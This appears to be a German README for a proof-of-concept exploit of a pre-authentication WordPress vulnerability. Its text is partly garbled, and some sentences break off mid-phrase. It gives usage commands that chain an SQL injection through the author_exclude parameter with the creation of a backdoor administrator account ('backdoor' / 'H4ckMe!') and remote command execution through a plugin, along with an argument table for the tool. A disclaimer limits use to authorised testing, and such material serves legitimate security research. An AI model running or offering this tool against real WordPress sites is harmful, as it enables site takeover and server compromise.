
Proof-of-Concept-Exploit für CVE-2026-63030, eine Pre-Authentication-Schwachstelle in WordPress (Versionen 6.9.0 bis 7.0.1).
Proof-of-Concept-Exploit für CVE-2026-63030, eine Vorauthentifizierungs-Schwachstelle in WordPress (Versionen 6.9.0 bis 7.0.1). Er verknüpft:
author_excludepython3 cve_2026_63030_exp.py --url http://target-wordpress.com/ --command "whoami"
# Auto-exploit with random admin credentials and run 'id'
python3 exploit.py --url http://192.168.1.100/wordpress/
# Custom admin and command
python3 exploit.py --url https://vuln-site.com/ --username backdoor --password 'H4ckMe!' --command 'ls -la /var/www/html'
author_exclude-Parameter und nutzt die Routen-Verwechslung aus, um eine UNION-Abfrage auszuführen.shell_exec() ausführt.Dies ist ausschließlich ein Proof-of-Concept.
Er ist gedacht für:
Verwenden Sie ihn nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche schriftliche Erlaubnis zum Testen haben. Die Autoren übernehmen keine Haftung für Missbrauch.
wp-config.php hat, kann die SQLi fehlschlagen.DISALLOW_FILE_MODS und DISALLOW_UNFILTERED_HTML in der Konfiguration des Ziels.| Argument | Beschreibung |
|---|
--url | Ziel-URL der WordPress-Installation (erforderlich) |
--username | Zu erstellender Admin-Benutzername (wird automatisch generiert, falls nicht angegeben) |
--password | Admin-Passwort (wird automatisch generiert, falls nicht angegeben) |
--email | Admin-E-Mail (wird automatisch generiert, falls nicht angegeben) |
--command, -c | Auszuführender Befehl über das Plugin (Standard: id) |
--post-id | ID eines veröffentlichten Beitrags angeben (wird automatisch erkannt, falls nicht angegeben) |
--timeout | HTTP-Timeout in Sekunden (Standard: 60) |